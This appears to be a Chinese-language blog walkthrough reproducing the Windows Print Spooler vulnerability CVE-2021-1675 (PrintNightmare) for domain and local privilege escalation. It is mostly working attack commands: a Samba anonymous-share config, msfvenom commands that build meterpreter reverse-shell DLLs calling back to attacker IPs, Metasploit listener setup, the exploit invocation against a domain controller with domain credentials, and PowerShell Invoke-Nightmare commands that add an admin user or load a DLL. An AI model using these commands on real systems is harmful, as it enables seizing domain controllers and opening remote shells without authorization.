CVE-2021-1675 漏洞复现

    漏洞复现   域渗透 内网渗透

复现环境

image-20210712154750502-1626096264319

靶机:Windows Server 2019

攻击机:kali

漏洞介绍

Windows Print SpoolerWindows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。

该漏洞广泛的存在于各Windows版本中,利用复杂度为中,但由于成功利用该漏洞的攻击者可以完整的控制域环境,造成非常严重的后果,所以该漏洞的利用价值极高。

影响版本

Windows Server 2016

Windows Server 2019

利用前提

1.靶机没有更新CVE-2021-1675的补丁

2.域内任意账户的用户名密码

3.域控ip

4.可被域控匿名访问的共享文件夹

漏洞工具

CVE-2021-1675(域提权):https://github.com/cube0x0/CVE-2021-1675

CVE-2021-1675本地提权:https://github.com/gyaansastra/Print-Nightmare-LPE

漏洞复现

一、域提权

1.配置smb服务

下面为配置文件/etc/samba/smb.conf需要修改的地方。

[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445
    log level = 10


[share]
    comment = share
    path = /tmp
    guest ok = yes
    writable =yes
    browsable = yes
    #force user = smbuser

image-20210712160525719

启动smb服务

service smbd start

image-20210712175213389

2.探测是否存在漏洞

使用impacket工具包中的rpcdump.py判断目标及其是否存在漏洞

rpcdump.py @10.99.99.250 | grep MS-RPRN

image-20210712174728578

3.使用msf生成恶意dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.99.99.175 LPORT=9999 -f dll -o /tmp/test.dll


注意:只能使用64位的dll文件,否则会发现,dll可以上传但不会被执行

image-20210712175116350

4.开启msf监听

使用msf监听,首先输入msfconsole

image-20210712160656595

输入以下内容监听

use exploit/multi/handler

 set payload windows/x64/meterpreter/reverse_tcp

set lhost 10.99.99.175

set lport 9999

run

image-20210712163217005

5.漏洞利用

进入exp目录

cd /root/CVE-2021-1675-main

image-20210712175651048

漏洞利用

其中cyberpeace为域的名字,admin:qq123456..分别是域控任意用户的账号密码,10.99.99.250是域控ip。 后面的\\10.99.99.175\share\test.dll为smb可访问的unc路径,也是共享文件的路径。

python3 CVE-2021-1675.py cyberpeace/admin:qq123456..@10.99.99.250 "\\\10.99.99.175\share\test.dll"

image-20210712175801457

成功获取域控权限

image-20210712175819130

查看当前主机权限和主机信息

getuid     #查看当前权限
sysinfo    #查看主机信息

image-20210712175851890

二、本地提权

1.新增用户

默认添加一个新用户到本地管理员组:

powershell
Import-Module .\cve-2021-1675.ps1       #导入模块
Invoke-Nightmare -newuser "test" -newpassword "test" -drivername "printme"     #新建用户,用户名:test  密码:test

image-20210724102544130

验证攻击是否成功

image-20210724102704150

2.自定义dll文件

msf生成dll文件

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.3.54 lport=4444 -f dll > x.dll

image-20210724102853669

监听主机

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.93.40
set lport 4444
exploit

image-20210724102953211

加载dll文件

Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DLL "C:\Users\Administrator\Downloads\x.dll"

image-20210724103107660

主机成功上线

image-20210724103249805

AD钙奶

Good Good Study, Day Day Up~